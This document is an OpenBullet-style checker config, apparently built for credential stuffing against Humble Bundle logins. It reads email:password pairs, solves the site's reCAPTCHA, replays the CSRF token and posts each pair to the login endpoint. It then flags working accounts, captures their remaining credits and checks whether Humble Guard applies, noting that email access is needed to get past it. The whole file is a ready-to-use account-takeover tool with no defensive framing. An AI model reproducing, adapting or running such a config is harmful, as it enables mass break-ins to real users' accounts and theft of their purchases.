[SETTINGS]
{
  "Name": "Humble Bundle",
  "SuggestedBots": 5,
  "LastModified": "2018-05-21T21:49:15.3884785+00:00",
  "AdditionalInfo": "Need email access cause it has guard",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET REQUEST GET "https://www.humblebundle.com/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
RECAPTCHA "https://www.humblebundle.com/" "6LdsABsUAAAAAAWcUQhPOAGGWP4z9bkKrNaiCeK8" -> VAR "RECAP" 
#PARSE_CSRF PARSE "<COOKIES(csrf_cookie)>" LR "" "" Recursive=FALSE -> VAR "CSRF" "" "" 
#POST REQUEST POST "https://www.humblebundle.com/processlogin" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&goto=%2Fmonthly&qs=refc%3DPnF2CO&g-recaptcha-response=<RECAP>&captcha-invisible=true" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.humblebundle.com/" 
  HEADER "origin: https://www.humblebundle.com" 
  HEADER "x-requested-with: XMLHttpRequest" 
  HEADER "csrf-prevention-token: <CSRF>" 
#CAPTURE_CREDITS PARSE "<SOURCE>" JSON "credits_remaining" Recursive=FALSE -> CAP "Credits" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Email and password don't match" 
  KEYCHAIN Success OR 
    KEY "success\": true" 
#GET_ORDERS REQUEST GET "https://www.humblebundle.com/user/unclaimed_orders" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "x-requested-with: XMLHttpRequest" 
  HEADER "referer: https://www.humblebundle.com/home/purchases" 
#CAPTURE_ORDERS PARSE "<SOURCE>" JSON "humble_guard_required" Recursive=FALSE -> CAP "Humble Guard" "" "" 
